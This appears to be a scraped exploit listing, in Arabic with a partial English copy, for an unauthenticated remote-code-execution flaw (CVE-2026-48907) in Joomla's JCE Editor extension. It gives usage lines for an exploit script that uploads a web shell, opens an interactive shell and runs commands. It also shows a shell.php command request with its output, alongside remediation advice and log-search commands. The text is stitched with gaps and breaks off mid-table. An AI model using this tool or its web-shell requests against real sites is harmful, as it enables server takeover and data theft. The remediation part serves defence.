## https://sploitus.com/exploit?id=74A39151-6177-5F8E-882E-5886E4BF188D
# ─── CVE-2026-48907 ───
# 🏴 AMN SECURITY 🏴
### مركز أبحاث الأمن السيبراني | Cyber Security Research Center
[](https://amn.amnoffsec.workers.dev/)
[](https://www.instagram.com/ixctw)
[](mailto:ayman.mahmoudoffsec@gmail.com)
---
# ⚠️ ثغرة تنفيذ أوامر عن بُعد في إضافة JCE Editor لـ Joomla
### CVE-2026-48907 | CVSS 9.8 | حرجة جداً (CRITICAL)
---
### 📋 الملخص التنفيذي
ثغرة أمنية خطيرة جداً في إضافة **JCE Editor** (النمط JCE — Joomla Content Editor) لنظام إدارة المحتوى **Joomla**، تسمح لمهاجم غير مُصادق (بدون تسجيل دخول) بإنشاء ملفات تعريف محرر جديدة، مما يؤدي في النهاية إلى رفع وتنفيذ كود PHP ضار على الخادم المستهدف.
هذه الثغرة مصنفة بـ **CVSS 9.8 (Critical)**، وتسمح باستيلاء كامل على موقع Joomla دون الحاجة إلى أي صلاحيات مسبقة. تم إصلاح الثغرة في الإصدارات **Joomla 5.1.6** و **Joomla 4.4.11**.
| العنصر | التفاصيل |
|--------|----------|
| **CVE** | CVE-2026-48907 |
| **CVSS v3.1** | 9.8 (Critical) |
| **المتجه** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **النوع** | Unauthenticated Remote Code Execution |
| **المنتج** | Joomla! CMS (إضافة JCE Editor) |
| **الإصدارات المتأثرة** | Joomla 4.x
--boundary--
```
#### الخطوة 3: تنفيذ الأوامر
```
GET /media/com_jce/shell.php?cmd=id HTTP/1.1
Host: target-joomla.com
→ uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
---
### 🖥️ استخدام الأداة
```bash
# فحص الهدف
python3 CVE-2026-48907.py -t https://target-joomla.com --check
# استغلال كامل مع رفع Web Shell
python3 CVE-2026-48907.py -t https://target-joomla.com --exploit -o shell.php
# وضع شيل تفاعلي
python3 CVE-2026-48907.py -t https://target-joomla.com --interactive
# عبر بروكسي
python3 CVE-2026-48907.py -t https://target-joomla.com --proxy http://127.0.0.1:8080
# تنفيذ أمر مباشر
python3 CVE-2026-48907.py -t https://target-joomla.com -c "whoami && id"
```
#### الخيارات المتاحة
| الخيار | الوصف |
|--------|-------|
| `-t, --target` | رابط موقع Joomla المستهدف |
| `--check` | فحص وجود الثغرة فقط |
| `--exploit` | استغلال الثغرة ورفع Web Shell |
| `-o, --output` | اسم ملف Web Shell الناتج |
| `--interactive` | وضع شيل تفاعلي |
| `-c, --command` | تنفيذ أمر مباشر |
| `--proxy` | بروكسي HTTP لتصحيح الأخطاء |
| `--profile-name` | اسم ملف التعريف (اختياري) |
| `--verbose, -v` | إظهار تفاصيل إضافية |
---
### 🛡️ الإجراءات العلاجية
| الإجراء | الأولوية | الوصف |
|---------|----------|-------|
| **تحديث Joomla** | 🟢 فوري | تحديث Joomla إلى 5.1.6 أو 4.4.11 |
| **تعطيل JCE Editor** | 🟢 مؤقتاً | تعطيل الإضافة لحين التحديث |
| **تدقيق ملفات التعريف** | 🟡 مهم | مراجعة وحذف أي ملفات تعريف غير مصرح بها |
| **فحص الملفات المرفوعة** | 🟡 مهم | البحث عن ملفات PHP خبيثة في media/com_jce/ |
| **مراجعة السجلات** | 🔵 مستمر | تدقيق سجلات الخادم بحثاً عن نشاط مشبوه |
#### أوامر فحص سريعة
```bash
# البحث عن ويب شيلز
find /var/www/html -name "*.php" -newer /var/www/html/configuration.php
# فحص السجلات
grep -r "com_jce" /var/log/apache2/access.log | grep -i "shell\|cmd\|system"
# التحقق من الإصدار
grep -r "JCE" /var/www/html/administrator/manifests/files/joomla.xml
```
---
### 📊 تقييم التأثير
| المجال | التأثير |
|--------|---------|
| **السرية (Confidentiality)** | 🔴 اختراق كامل — يمكن قراءة جميع البيانات |
| **السلامة (Integrity)** | 🔴 اختراق كامل — يمكن تعديل جميع البيانات |
| **التوفر (Availability)** | 🔴 اختراق كامل — يمكن تعطيل الموقع |
| **صعوبة الاستغلال** | 🟢 منخفضة — لا يتطلب صلاحيات أو معرفة متقدمة |
| **اكتشاف الهجوم** | 🟡 متوسط — يمكن اكتشافه في السجلات |
---
### 🔗 المراجع
- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2026-48907
- **Joomla Release**: https://www.joomla.org/announcements/release-news/5894-joomla-5-1-6-and-joomla-4-4-11-security-fixes.html
- **JCE Editor**: https://www.joomlacontenteditor.net/
- **CWE-94**: Improper Control of Generation of Code (Code Injection)
> ⚠️ **إخلاء مسؤولية**: هذا التقرير لأغراض تعليمية وبحثية فقط. استخدام هذه المعلومات لأغراض غير قانونية يتحمل المستخدم مسؤوليته بالكامل.
---
### 🔗 تواصل مع AMN SECURITY
[](https://amn.amnoffsec.workers.dev/)
[](https://www.instagram.com/ixctw)
[](mailto:ayman.mahmoudoffsec@gmail.com)
---
# ⚠️ CVE-2026-48907 — Joomla JCE Editor Unauthenticated Remote Code Execution
### CVSS 9.8 | CRITICAL | Remote Code Execution
---
### Executive Summary
**CVE-2026-48907** is a critical unauthenticated Remote Code Execution (RCE) vulnerability in the **JCE Editor** extension for **Joomla CMS**. This vulnerability allows attackers without any authentication to create new editor profiles and ultimately upload and execute arbitrary PHP code on the target server.
The vulnerability has been assigned a **CVSS score of 9.8 (Critical)** and allows complete compromise of Joomla websites. It was patched in **Joomla 5.1.6** and **Joomla 4.4.11**.
| Field | Value |
|-------|-------|
| **CVE** | CVE-2026-48907 |
| **CVSS v3.1** | 9.8 (Critical) |
| **Vector** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **Type** | Unauthenticated Remote Code Execution |
| **Product** | Joomla CMS (JCE Editor Extension) |
| **Affected Versions** | Joomla 4.x ⚠️ **Disclaimer**: This report is for educational and research purposes only. Unauthorized use of this information is illegal and the user bears full responsibility.